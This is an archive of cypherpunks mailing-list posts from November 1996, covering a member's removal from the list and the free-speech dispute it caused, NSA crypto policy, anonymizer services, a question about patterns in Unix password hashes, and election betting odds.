Is there meanwhile a http relay cgi script out there which could be
packaged with the common http daemons (like cern, apache or ncsa) ?
The use of that is obvious: every new web server could be used as
anonymizer and thus proxies would have a hard time to filter all those
sites in censorship countries.

Greetings
 Niels Provos =8)

- PHYSnet Rechnerverbund     PGP V2.6 Public key via finger or key server
  Niels Provos               
  Universitaet Hamburg       WWW: http://www.physnet.uni-hamburg.de/provos/   
  Jungiusstrasse 9           E-Mail: provos@wserver.physnet.uni-hamburg.de
  Germany 20355 Hamburg      Tel.:   +49 40 4123-2504     Fax: -6571 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 2 Nov 1996 10:34:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis is not on cypherpunks any more
Message-ID: <3.0.32.19961102103422.00742504@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:13 AM 11/2/96 -0800, John Gilmore <gnu@toad.com> wrote:
>As stated by Dr. Vulis, he is no longer on the cypherpunks mailing
>list, and indeed majordomo@toad.com HAS been instructed to ignore his
>requests to resubscribe.
>
>I removed him, on my own initiative.  I got tired of asking him to
>stop stirring up flames.  When he posted a message saying that we'd
>have to use technical means to stop him from flaming the list, I said,
>"OK".
[snip]

This all seems really silly to me.

Are people on this list not sophisticated enough to be capable of filtering
his posts if they don't like to read them?

What's to stop him from using reailers or nymservers?  Are you going to
block them, too?

By doing something like this you give him far more attention and
encouragement than he deserves.  It's a big mistake, IMHO.



Rich


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 2 Nov 1996 11:11:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: What happened to the NSA's _second_ mission?
In-Reply-To: <199611021806.KAA05269@netcom6.netcom.com>
Message-ID: <v03007800aea14b36ba72@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


(president@whitehouse.gov removed from the cc: list for obvious reasons)

At 10:09 AM -0800 11/2/96, Bill Frantz wrote:

>I don't think either of these exclusions would cover the reference
>implementation of the SET protocol.  I don't think it would cover an
>electronic commerce application running on a personal computer/workstation
>either.  Therefore I conclude that the ITAR is contributing to the
>vulnerability of our emerging electronic commerce infrastructure.

Given the reported statistics on the _meager_ number of serious crimes
which have been stopped by the use of surveillance and wiretaps (reported
in various forms several times in recent months), and given that electronic
commerce may be vulnerable to _serious_ disruptions, one has to (again)
wonder if the charter of the National _Security_ Agency needs a careful
reevaluation.

Some years back, the NSA was more explicitly divided into two functions,
one function doing SIGINT/COMINT, and the other doing COMSEC and INFOSEC,
i.e., working on mechanisms to better secure the nation's communicaitons.
At about this time, circa 1988, the NSA's COMSEC folks were _explicitly_
warning that DES was long overdue for replacement and that new measures
were urgently needed to secure the nation's communications and financial
infrastructure. (The details have faded in my memory, but I believe this
was the time the "Commercial COMSEC Endorsement" program was being
discussed, with various hardware and software being proposed....don't know
how it eventually turned out, faded out, etc.)

So where are we today? Almost 10 years later, with huge advances in chip
power and density (500 MHz processors, 250,000-gate-equivalent PLDs, etc.),
and yet what do we have? Only plain old DES-level cryptography is being
encouraged, with various roadblocks placed in front of efforts to deploy
stronger crypto.

Jeesh. To supposedly wiretap a few terrorists we risk the whole enchilada.

Of course, I suspect the real issue is that the NSA understands the
implications of strong crypto, anonymous remailers, untraceable digital
cash, etc., and is thus taking what steps it thinks it can to limit the
spread of these technologies. The wiretap stuff is just a figleaf.

--Tim May




"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sat, 2 Nov 1996 12:02:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: www.anonymizer.com down?
In-Reply-To: <1.5.4.32.19961101145104.006a0c20@pop.pipeline.com>
Message-ID: <55g9cq$71k@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <1.5.4.32.19961101145104.006a0c20@pop.pipeline.com>,
John Young  <jya@pipeline.com> wrote:
>The site is open to anyone, the more anonymous the better. 
>Use anonymizer.com.

I would, but it seems to be unavailable.  There is currently no response
on www.anonymizer.com:8080.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMnuo1UZRiTErSPb1AQHMKQP/UhbmtAKyuRDs4ZVVPwOmTLJ1sfCmn0t8
2UI0G26j9PcU4BpU6ZihRefREj7yW6ZvK5ME9GJMhD3sDvKGS7FJVFUVvMonyDEe
+NqU548ta4RCoVd22BuuURr7MF7V7U6CKoisAoLYi7cXYq3E92296RWBS3qs4d00
zcKzUAwIqUI=
=ozvP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 2 Nov 1996 09:00:43 -0800 (PST)
To: erp@digiforest.com>
Subject: Re: Unix User Password File Encryption
In-Reply-To: <Pine.LNX.3.95.961102024749.14461A-100000@digital.digiforest.com>
Message-ID: <Pine.LNX.3.95.961102125436.194A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Nov 1996, Erp wrote:

> Basically it would take a beginning word and encrypt it with the same salt
> as used on the password in the passwd file.  So let us say that for an
> example our salt is aa, our outcome encrypted password is X8mfjs53D ...
> Ok now let us say that we take this salt of aa and run through the
> following into it and getting these patterns from it (these aren't the
> true patterns etc, I'm just making htese things up, but would it be
> possible?)  
> 
> salt aa  --  inputed password  0001  --  outcome encryption  Zkdrj234S
> salt aa  --  inputed password  0002  --  outcome encryption  Rksjr342s
> salt aa  --  inputed password  0003  --  outcome encryption  25Svj43zY
[rest deleted]

There aren't any known patterns that can be exploited.  The output of DES
encryption 25 times generates pseudo-random output.  If a pattern did exist,
cryptanalysis of DES would be very easy.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMnuMoSzIPc7jvyFpAQFePAgAjOfKSSjpXE20g4+3t6PSz1bD+7tSd5Yi
mTjt5zlS/D9NGEXoVkuYI/j7KS+Iic7eNhEUTr8KuUpIS+MUIB0BKHLM0LyaFHmG
dgd2LoqVHoC8vEIwFDxXR/vE+Jt51bFXs2/eKksyqJKLrI6g1i+foANLOBhhxobI
I07Z+mQ7XEsKe6C7eEuElvd4qY6Zis0WJD7lj/c9tOPg3wjGCIohgeclwgByqBvd
6kuxu9b2unFpbcsaICqtxJiHqgJAWjuE0FEz3wkKakIKAwmDmJ1mpru4dP73OwCc
qt5TCytlKq7VN75QawK/YlNX3h24QnyXB/Zo6MOSQCcYGn7UmB/3nA==
=fv2A
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erp <erp@digiforest.com>
Date: Sat, 2 Nov 1996 12:35:53 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: Unix User Password File Encryption
In-Reply-To: <Pine.LNX.3.95.961102125436.194A-100000@gak.voicenet.com>
Message-ID: <Pine.LNX.3.95.961102132046.15853A-100000@digital.digiforest.com>
MIME-Version: 1.0
Content-Type: text/plain



**what I said deleted**
> 
> There aren't any known patterns that can be exploited.  The output of DES
> encryption 25 times generates pseudo-random output.  If a pattern did exist,
> cryptanalysis of DES would be very easy.
> 
> Mark

But But But *laugh* ---  Ok, here is my only straw in this lousy bushel of
confusion >) ---  What about a Fuzzy Pattern?  ----  Ya I know, that is a
pretty big staw...  The thought of it is fuzzy, let alone a fuzzy pattern.

I've done a lot of reading on Fuzzy Sets and Fuzzy Logic in general..  I
see how it could work 'maybe' But, yes it is a very indefinite field..  To
many people don't believe in its possible existance...
Ok --  Any replys would be nice thanks bye.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 2 Nov 1996 13:31:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: No - Re: www.anonymizer.com down?
Message-ID: <1.5.4.32.19961102212934.003aee7c@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 PM 11/2/96 -0800, iang@cs.berkeley.edu (Ian Goldberg) wrote:
>I would, but it seems to be unavailable.  There is currently no response
>on www.anonymizer.com:8080.

I just tried it, and it's very slow, and asks for cookies, but it works.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Sat, 2 Nov 1996 11:27:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Moneychangers and Shylocks
In-Reply-To: <19961102153422.6553.qmail@squirrel.owl.de>
Message-ID: <0mSu1s200YUh0Ms280@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Secret Squirrel <nobody@squirrel.owl.de> writes:
> jer+@andrew.cmu.edu wrote:
> 
> > "Timothy C. May" <tcmay@got.net> writes:
> 
> > > and opportunity for me and my family, Arguing
> > > that native peoples were better off before the arrival of Europeans is
> > > fatuous nonsense--you can't go home again.
> > 
> > Not true. "Society" has passed through Africa many times, the people
> > revert to their previous ways.
> 
> I disagree. Only some ways, you don't see them tossing their AK 47s for spears.

Once they run out of ammunition... Really, most weapons in the more
primitave parts of africa haf about 3 rounds of ammunition for them.
The bands of AK-welding poachers and the like are paramilitary groups
supported by professional poaching operations or they're fighting some
"benefactor" nation's dirty little wars for them. The media
representation is quite skewed, as is usually the case.

> > > Further, many of the leftist critiques of "moneylending as exploitation"
> > > are similar to past (and current) demonizations of moneychangers,
> > > moneylenders, shylocks, and other assorted stereotypes.
> > >
> > > I don't favor nationalistic lending and borrowing policies, which, for
> > > example, involve some central government borrowing money, sending the
> > > borrowed funds to personal Swiss bank accounts, and then sticking the
> > > nominal taxpayers with the debt. Nothing I have said here endorses
> >  this.
> > 
> > But that's the only way it hapens in the third world. The only time
> > foreign aid is not gutted by corrupt beaurocrats is when the
> > Westerners go there and manage the projects themselves. This is quite
> > different from a loan.
> 
> Wrong, and wrong. Lending to individuals is happening, in $100 or so ammounts,\
>  without westerners (or their governments' crooked bureaucrats) present, right\
>  now.

I'd like to hear more about this. Can you send me/.the list some info?

> > > But much lending is useful. It's the way factories get built, the way
> > > things get done.
> > 
> > Heh, have you ever *seen* a third world factory 10 years after it was
> > built. Nice bit of scap, that.
> 
> Ask of government was involved.

Given the nature of many of these governments, privately-owned
factories are a no-no.
 
> > > Much of the criticism of "moneylenders" is closely related, if you
> >  think
> > > about it, to criticism of "money launderers." Cypherpunks should relish
> >  the
> > > rise of new mechanisms for money laundering, moneylending, tax evasion,
> >  etc.
> > >
> > > I took the "Wired" quote about Walter Wriston "sounding like a
> >  cypherpunk"
> > > to represent this new view, in explicit contrast to his earlier views
> >  when
> > > he headed Citibank and they had a more statist approach.
> > >
> > > Your mileage may vary, but tired homilies about lending being exploitati
> > on
> > > are not very useful in this day and age.
> > 
> > I dunno, pearls befre swine still applies. It's not that I think
> > lending is bad, but large economic development loans to thrild world
> > countries continue to support corruption and oppression, and not much
> > else.
> 
> Because of governments more than banks. You are beginning to see the light.

There is no or little infrastructure to support large-scale private
lending in most African nations. THe government wants its 20% cut, or
the currency must be exchanged at artificial rates, or you must meet
rediculous regulatory requirements. And most of these governments are
not above making large amounts of people dissapear if they don't
follow the rules.

But to a large extent we agree. Private lending can be a very Good
Thing. However, given the current regulatory practices in many African
(and I assume most third world) nations, large-scale private lending
is not a viable solution. I mean, it really is a morass. Everyone has
to work within the system (this includes those wealthy enough to
ignore the laws and bribe their way through), and the system tends to
be large, cumbersome, and astoundingly slow.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMnugcskz/YzIV3P5AQHKkwMAhzpE7lNB4LGVxPKE6Wfz4XX8N5wte+pU
4uaEuwiCy6luhZ4ZT2xHX2ZNFK4zUZAIwHVzPpSscAxfWUiFX9zPuZ5HR2HdueUF
2WzR8eujH+vGoCiHeTuKq+LA1HHRZ85P
=AiRB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 2 Nov 1996 12:42:13 -0800 (PST)
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: anonymous oddsman
In-Reply-To: <199611021758.JAA04138@abraham.cs.berkeley.edu>
Message-ID: <199611022039.OAA04636@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


John Anonymous MacDonald wrote:
> 
> Ladbroke's (celebrating Halloween, probably) again offers
> 50:1 odds on Perot! Clinton and Browne are still not being
> offered. Recalling last Saturday's Dole odds; they were
> 7:1 at Ladbroke's, and 8:1 at William Hill. The betters at
> Ladbroke's (who get a somewhat worse deal, it seems) are
> bullish on Dole, while those at William Hill are now a bit
> more bearish on the old man, so the numbers diverge in the
> final stretch of the horserace.
> 
>               Prices @ 09:21 GMT Sat 2nd Nov 96
>         +---------+----------------+----------------+
>         |         |  Ladbroke's    | William Hill   |
>         +---------+----------------+----------------+
>         | Clinton | Not currently offered by either |
>         | Dole    |     6:1        |     10:1       |

Whew! They are wide open for arbitrage! Suppose that at Ladbroke I sell
an obligation to pay $6 if Dole wins (they are apparently valuing it for
this much), collecting $1. At the same time, to hedge my exposure, I go
to "William Hill", and purchase their obligation to pay _me_ $10 if Bob
Dole wins, paying the $1 bill that I just got at Ladbroke's.

If bob dole loses, I lose nothing. If he wins, I make $4 out of air.

I wonder why the beting markets are so imperfect.


have fun

igor



>         | Perot   | 50:1 (again)   |    500:1 (!)   |
>         | Browne  | Not currently offered by either |
>         +---------+----------------+----------------+
>         | Phone   | +44-800-524524 | +44-800-444040 |
>         | Numbers:|                |                |
>         +---------+----------------+----------------+
> 
> As for the animal suspected of *really* running the U.S.A,
> "Socks" appears to be successfully defending his territory
> against "Leader." Full of confidence, she is now running
> virtual tours of the White House, kids!
> 
> http://www.whitehouse.gov/WH/kids/html/home.html
> 
> Meanwhile "Leader" whimpers at
> 
> http://www.firstdog.com/
> 
> (Wow, his own domain!) Perot (obviously) needs no pet, and
> the oddsman is unaware of any public photos of Libertarian
> candidate Browne's cats, much less their names. A serious
> campaign.
> 
> Our roving reporter in the UK also thinks that there *must*
> be significance in the fact that our Presidential election
> is being held on the anniversary of the day that Guy Fawkes
> attempted to blow up his Houses of Parliament, together
> with all the politicians within. He, as usual, will celebrate
> the event with bonfires and fireworks.
> 
> Mailmasher.com appears to be down, apologies to any of you
> who wished to correspond personally with the oddsman there.
> Hopefully, oddsman@mailmasher.com will come back soon.
> anonymous oddsman
> 
> "Demeaning the integrity of the U.S. Presidential election process
> for you on a regular basis, at no charge."
> 
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <nobody@squirrel.owl.de>
Date: Sat, 2 Nov 1996 08:29:51 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Moneychangers and Shylocks
Message-ID: <19961102153422.6553.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


jer+@andrew.cmu.edu wrote:

> "Timothy C. May" <tcmay@got.net> writes:

> > and opportunity for me and my family, Arguing
> > that native peoples were better off before the arrival of Europeans is
> > fatuous nonsense--you can't go home again.
> 
> Not true. "Society" has passed through Africa many times, the people
> revert to their previous ways.

I disagree. Only some ways, you don't see them tossing their AK 47s for spears.

> > Further, many of the leftist critiques of "moneylending as exploitation"
> > are similar to past (and current) demonizations of moneychangers,
> > moneylenders, shylocks, and other assorted stereotypes.
> >
> > I don't favor nationalistic lending and borrowing policies, which, for
> > example, involve some central government borrowing money, sending the
> > borrowed funds to personal Swiss bank accounts, and then sticking the
> > nominal taxpayers with the debt. Nothing I have said here endorses
>  this.
> 
> But that's the only way it hapens in the third world. The only time
> foreign aid is not gutted by corrupt beaurocrats is when the
> Westerners go there and manage the projects themselves. This is quite
> different from a loan.

Wrong, and wrong. Lending to individuals is happening, in $100 or so ammounts, without westerners (or their governments' crooked bureaucrats) present, right now.

> > But much lending is useful. It's the way factories get built, the way
> > things get done.
> 
> Heh, have you ever *seen* a third world factory 10 years after it was
> built. Nice bit of scap, that.

Ask of government was involved.

> > Much of the criticism of "moneylenders" is closely related, if you
>  think
> > about it, to criticism of "money launderers." Cypherpunks should relish
>  the
> > rise of new mechanisms for money laundering, moneylending, tax evasion,
>  etc.
> >
> > I took the "Wired" quote about Walter Wriston "sounding like a
>  cypherpunk"
> > to represent this new view, in explicit contrast to his earlier views
>  when
> > he headed Citibank and they had a more statist approach.
> >
> > Your mileage may vary, but tired homilies about lending being exploitati
> on
> > are not very useful in this day and age.
> 
> I dunno, pearls befre swine still applies. It's not that I think
> lending is bad, but large economic development loans to thrild world
> countries continue to support corruption and oppression, and not much
> else.

Because of governments more than banks. You are beginning to see the light.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: darius@hotliquid.com
Date: Sat, 2 Nov 1996 12:38:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: [NOISE] Re: Thank you, John Gilmore, for protecting freedom of speech against Dr. Dmitri Vulius
Message-ID: <SIMEON.9611021505.A@arabica.hotliquid.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 2 Nov 1996 06:45:54 -0800 John Anonymous MacDonald 
<nobody@cypherpunks.ca> wrote:

 > Thank you, John, for being 
so brave and protecting our freedom of
> on-topic speech. You are a true cypherpunk.
> 
> Thank you, Timothy C May, for advancing cryptography by posting 100%
> crypto-relevant messages about loans to other countries and your
> collection of assault weapons.
> 
> John and Timothy just made the cypherpunks list better.

----------------------
Well, here's the wonderful thing about cypherpunks.  It's 
a privately run list.  There isn't freedom to flame 
wantonly, there isn't a 'right to insult'  Vulius has 
plagued this list for quite some time.  I'm glad he's 
been removed.

We return you to your regularly scheduled on-topic posts.

darius@hotliquid.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 2 Nov 1996 15:54:19 -0800 (PST)
To: Rich Burroughs <richieb@teleport.com>
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <3.0.32.19961102103422.00742504@mail.teleport.com>
Message-ID: <Pine.SUN.3.91.961102153652.8716A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Rich,

On Sat, 2 Nov 1996, Rich Burroughs wrote:

> Are people on this list not sophisticated enough to be capable
> of filtering his posts if they don't like to read them?

The short answer is, No.  More specifically, we constantly have
a stream of new readers sampling Cypherpunks.  Some are 
technically sophisticated; some are not.  In either case, new
readers do not have the historical perspective not to fall for
Dimitri's big lies.  Nor do they have any way of know what an
abberation his sort of behavior is on this list.  "So this is
what Cypherpunks are like," would be a sad, but understandable
misinterpretation of what we're all about.  What John did was 
appropriate.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 2 Nov 1996 16:51:32 -0800 (PST)
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <Pine.SUN.3.91.961102153652.8716A-100000@crl.crl.com>
Message-ID: <199611030050.QAA00717@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort writes:
> 
> 
> Rich,
> 
> On Sat, 2 Nov 1996, Rich Burroughs wrote:
> 
> > Are people on this list not sophisticated enough to be capable
> > of filtering his posts if they don't like to read them?
> 
> The short answer is, No.  More specifically, we constantly have
> a stream of new readers sampling Cypherpunks.  Some are 
> technically sophisticated; some are not.  In either case, new
> readers do not have the historical perspective not to fall for
> Dimitri's big lies.  Nor do they have any way of know what an
> abberation his sort of behavior is on this list.  "So this is
> what Cypherpunks are like," would be a sad, but understandable
> misinterpretation of what we're all about.  What John did was 
> appropriate.


When I joined the list three or so years ago, L. Detwiller was
the contemporary equivalent of Vulis.  The intro message mailed to
new subscribers explained the situation with Detwiller and asked
new subscribers to not respond to his bait.  It seemed to
work pretty well- Detwiller's posts were pretty much ignored.
Eventually he started taking his meds again, or got tired of
being ignored, and started posting relatively understandable stuff.
Not everyone agrees with him, which is fine, but he stopped
talking about 'tentacles' and accusing random list members of
bizarre conspiracies.

The problem with 'blocking' someone from a list is that it
isn't effective.  Even without remailers, it's trivial to forge
mail well enough to get past any 'blocking' measure that
could be put in place.  It's also easy to subscribe under a new name.

The other, more serious problem is that it to some extent 'proves'
that cryptoanarchy "doesn't work".  "Look", some will say, "the Cypherpunks
anarchy doesn't even work on their own list and they had to _censor_
someone".  Yea, I know that the list isn't really anarchy (although
it's pretty close these days) and Vulis hasn't really been censored-
he's free to spew his trash, just not here.  But it'll look that way
to a lot of people.

I think in the end that filtering at the user end is the only (current)
effective way to deal with people like Vulis.  He went in to my kill file
almost immediately, as did a number of people who seemed to do little
recently except post rebuttal/arguments to him.  After all, it's my time
that I'm spending reading this list and I'm not going to waste
it on crap like flame wars with Vulis.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 2 Nov 1996 14:58:53 -0800 (PST)
To: devnull@manifold.algebra.com
Subject: Re: anonymous oddsman
In-Reply-To: <199611022039.OAA04636@manifold.algebra.com>
Message-ID: <199611022255.QAA05535@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Igor Chudov @ home wrote:
> 
> John Anonymous MacDonald wrote:
> > 
> > Ladbroke's (celebrating Halloween, probably) again offers
> > 50:1 odds on Perot! Clinton and Browne are still not being
> > offered. Recalling last Saturday's Dole odds; they were
> > 7:1 at Ladbroke's, and 8:1 at William Hill. The betters at
> > Ladbroke's (who get a somewhat worse deal, it seems) are
> > bullish on Dole, while those at William Hill are now a bit
> > more bearish on the old man, so the numbers diverge in the
> > final stretch of the horserace.
> > 
> >               Prices @ 09:21 GMT Sat 2nd Nov 96
> >         +---------+----------------+----------------+
> >         |         |  Ladbroke's    | William Hill   |
> >         +---------+----------------+----------------+
> >         | Clinton | Not currently offered by either |
> >         | Dole    |     6:1        |     10:1       |
> 
> Whew! They are wide open for arbitrage! Suppose that at Ladbroke I sell
> an obligation to pay $6 if Dole wins (they are apparently valuing it for
> this much), collecting $1. At the same time, to hedge my exposure, I go
> to "William Hill", and purchase their obligation to pay _me_ $10 if Bob
> Dole wins, paying the $1 bill that I just got at Ladbroke's.
> 
> If bob dole loses, I lose nothing. If he wins, I make $4 out of air.
> 
> I wonder why the beting markets are so imperfect.
> 
> 
> have fun
> 
> igor

Homework: guess how should I trade so that I lock in _definite_ profit
before elections such that I am fully hedged against any outcome of the
election.

igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sat, 2 Nov 1996 17:00:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis is not on cypherpunks any more
Message-ID: <3.0.32.19961102170056.00688698@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:52 PM 11/2/96 -0800, Sandy Sandfort <sandfort@crl.com> wrote:
>On Sat, 2 Nov 1996, Rich Burroughs wrote:
>
>> Are people on this list not sophisticated enough to be capable
>> of filtering his posts if they don't like to read them?
>
>The short answer is, No.  More specifically, we constantly have
>a stream of new readers sampling Cypherpunks.  Some are 
>technically sophisticated; some are not.

I am guessing that people who come to read cpunks are probably more likely
to have a grasp of filtering technologies than the average Net newbie.  I
may be mistaken.

>In either case, new
>readers do not have the historical perspective not to fall for
>Dimitri's big lies.  

Is telling the truth a requirement for participating on the list?  ;)

How about posting a mini-FAQ about Dimitri or something?  Responding to
speech you dislike with more speech?

>Nor do they have any way of know what an
>abberation his sort of behavior is on this list.

I think you underestimate people's ability to evaluate the situation.  You
mean well, but this type of paternal, well-meaning censorship is censorship
nonetheless.

(I know this isn't censorship in the strictest definition of the term, as
in government restriction of speech, but I'd like to see us err on the side
of keeping the forum as open as possible. YMMV.)

>"So this is
>what Cypherpunks are like," would be a sad, but understandable
>misinterpretation of what we're all about. 

Judging any Usenet newsgroup or mailing list based on it's kookiest member
could produce the same result.  I'm relying on people to be able to pick a
kook out of a crowd.

Would you prefer that the representation that people get of Cypherpunks be
of a group that kicks people off the list who disturb them?  Are
Cypherpunks that thin-skinned?  

I have never been forced to read one of the KOTM's messages -- it has
always been my choice to.

After the last Bernstein hearing, Tim and I ended up at the same table for
lunch, along with two other people.  The four of us began discussing
Scientology, and partway through the conversation I realized that the Tim I
was talking with was Tim May, and that we had already covered some of the
same ground on this list.

Tim was very persuasive in his view that the Scientologists should be given
the widest latitude to spread their views, and that their right to speak be
guaranteed.  While I consider myself a free speech advocate, I am not an
absolutist, and I loathe the CoS leadership.  I was much more equivocal
about their rights.

As the conversation went on, I found my self more and more drawn in by
Tim's arguments, as they were very much in line with my feelings on other
speech-related issues. I found his points very persuasive, and they have
had a lasting impact on my view of the situation, and my posts to
alt.religion.scientology.

I find it ironic to see someone kicked off a list for bad-mouthing Tim, who
I found to be a very eloquent defender of free speech.

> What John did was 
>appropriate.

I still think it's a big mistake.

How can you really keep him off the list?  Limit posting to subscribers?
Ban remailers and nym accounts?

Don't you think he'll try to make himself a martyr; a victim?  Will that
make Cypherpunks look better?



Rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Weiss <lazylion@idiom.com>
Date: Sat, 2 Nov 1996 17:19:35 -0800 (PST)
To: Cypherpunks@toad.com
Subject: Re: Dr. Vulis; John was right!
In-Reply-To: <3.0.32.19961102103422.00742504@mail.teleport.com>
Message-ID: <v03007800aea195dd7224@[206.14.165.67]>
MIME-Version: 1.0
Content-Type: text/plain


'nuf said.


Ben Weiss                          Digital Arts & Sciences Corporation
mailto://Ben@iis.DAScorp.com       (formerly Digital Collections, Inc.)
mailto://lazylion@idiom.com        http://www.DAScorp.com/
WB5QAL/6 (Ham Radio)               (510) 814-7200 x.240 voice

    Apple Partner, Apple Media Partner & Acius 4th Dimension Partner

  What part of 'Congress shall make no law abridging the freedom of speech'
    did you not understand?

Disclaimer:My company doesn't tell me what to say and I don't always say
           stuff with which they agree, but we still get along just fine






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Three Blind Mice <3bmice@nym.alias.net>
Date: Sat, 2 Nov 1996 15:05:31 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Unix User Password File Encryption
Message-ID: <199611022305.SAA22650@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Nov 1996, Erp wrote:

> Compare the outcomed encryptions --  And find a pattern in them..  Now in

There is the flaw in this logic.  If you do find a pattern, then this
means that the algorithm is *BROKEN*.

--3bmice





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Computer Virus Help Desk <cvhd@indyweb.net>
Date: Sat, 2 Nov 1996 15:49:40 -0800 (PST)
To: Rich Burroughs <richieb@teleport.com>
Subject: Re: Dr. Vulis is not on cypherpunks any more
Message-ID: <3.0b36.32.19961102184917.0069e3a0@indyweb.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:34 AM 11/2/96 -0800, you wrote:

>At 02:13 AM 11/2/96 -0800, John Gilmore <gnu@toad.com> wrote:

>>As stated by Dr. Vulis, he is no longer on the cypherpunks mailing
>>list, and indeed majordomo@toad.com HAS been instructed to ignore his
>>requests to resubscribe.

>>I removed him, on my own initiative.  I got tired of asking him to
>>stop stirring up flames.  When he posted a message saying that we'd
>>have to use technical means to stop him from flaming the list, I said,
>>"OK".
>[snip]

>This all seems really silly to me.

>Are people on this list not sophisticated enough to be capable of filtering
>his posts if they don't like to read them?
>
>What's to stop him from using reailers or nymservers?  Are you going to
>block them, too?
>
>By doing something like this you give him far more attention and
>encouragement than he deserves.  It's a big mistake, IMHO.
>Rich

Well put!  I tired a long time ago of Dr. Vulis and several others on this
list.  Rather than bitch about it or resort to the same big brother
gestapo-censor bullshit we profess to abhor I simply utilized the extensive
filtering capability of Eudora.

I don't need "big brother" or big "cypherpunk" censoring my mail for me.
We have become what we fear the most.  How prophetic and pathetic.

I agree.... a very BIG mistake, indeed....





